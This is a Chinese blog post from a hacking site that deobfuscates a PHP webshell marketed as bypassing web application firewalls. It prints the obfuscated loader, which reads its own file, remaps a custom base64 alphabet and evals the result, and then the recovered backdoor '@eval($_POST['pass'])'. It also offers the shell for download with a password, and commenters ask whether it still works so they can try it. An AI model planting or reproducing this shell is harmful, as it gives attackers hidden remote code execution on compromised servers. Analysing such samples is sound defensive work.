一款过waf的一句话木马分析

  • 内容
  • 相关

中午,下班回来,就看一个朋友给我发了几个马儿  让我看看解解密码  很简单

1.png2.png


猛不猛我不知道   那时候手机  太长的看着就烦   就回到家瞅瞅了

首先我们看这个马儿


4.png

一步步来,先分析前面的。前面的PHP代码部分有一个eval,我们改成echo试试

5.png

输出得到


$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};$OO0OO000O($O000O0O00,1136);$OO00O00O0=($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,380),'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0);
替换进去得到


6.png

下来我们就要分析了


<?php
$OOO0O0O00=__FILE__;
//$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');

$OOO000000='th6sbehqla4co_sadfpnr';

$OO00O0000=248;

//$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
//$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
//$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
$OOO0000O0='base64_decode';

$O0O0000O0='OOO0000O0';

//$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};
$OO0OO0000='fopen';

//if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');
$O000O0O00=fopen($OOO0O0O00,'rb');

//$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
$OO0OO000O=='fread';

//$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};
$OO0OO00O0='strtr';

//$OO0OO000O($O000O0O00,1136);
fread($O000O0O00,1136);

/*$OO00O00O0=($OOO0000O0(
    $OO0OO00O0(
	            $OO0OO000O($O000O0O00,380),
				'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
				'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
				)
			)
);*/

$OO00O00O0=(base64_decode(
	strtr(
		$OO0OO000O($O000O0O00,380),
		'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
		'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
		)
	)
);


;eval($OO00O00O0);
return;
?>
分析后总结得到



$OOO0O0O00=__FILE__;//获取当前文件名
$O000O0O00=fopen($OOO0O0O00,'rb');//打开文件
fread($O000O0O00,248);//跳过248字节
$OO00O00O0=(base64_decode(
	strtr(
		fread($O000O0O00,380),
		'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
		'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
		)
	)
);//读取380字节,根据代码表替换字符,base64解码
eval($OO00O00O0);//执行解码后的代码
10.png



解得


@eval($_POST['pass']);//密码就等于pass

怎么解得卖个关子  不会的可以看看

管理员设置 回复 可见隐藏内容




  文件名稱:一句话木马

  更新時間:

  下載声明:密码: gadu

立即下載

下载链接

网盘下载

密码: gadu

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:一款过waf的一句话木马分析 - https://www.0dayhack.com/post-836.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

25条评论
    1. avatar

      牧~师 Lv.1 Firefox 64.0 Firefox 64.0 Windows Windows 回复

      666学习一下

      山东省 电信

      1. avatar

        2222 Lv.1 Chrome 68.0.3440.106 Chrome 68.0.3440.106 Windows Windows 回复

        看看

        山西省 电信

        1. avatar

          A Lv.1 Firefox 62.0 Firefox 62.0 Windows Windows 回复

          还是要看看

          广东省佛山市 电信

          1. avatar

            sakula Lv.1 Chrome 64.0.3282.140 Chrome 64.0.3282.140 Windows Windows 回复

            学习

            浙江省杭州市 电信

            1. avatar

              wudi Lv.1 Sogou Explorer Sogou Explorer Windows Windows 回复

              厉害了,膜拜一下

              北京市 电信

              1. avatar

                wudi Lv.1 Sogou Explorer Sogou Explorer Windows Windows 回复

                学习一下,现在还能用吗,我去试一试....

                北京市 电信

                1. avatar

                  wudi Lv.1 Sogou Explorer Sogou Explorer Windows Windows 回复

                  学习一下,现在还能用吗,我去试一试

                  北京市 电信

                  1. avatar

                    zz Lv.1 Chrome 67.0.3396.99 Chrome 67.0.3396.99 Windows Windows 回复

                    学习学习

                    加拿大

                    1. avatar

                      haizi Lv.1 Chrome 55.0.2883.87 Chrome 55.0.2883.87 Windows Windows 回复

                      学习一下,现在还能用吗,我去试一试

                      广东省广州市 电信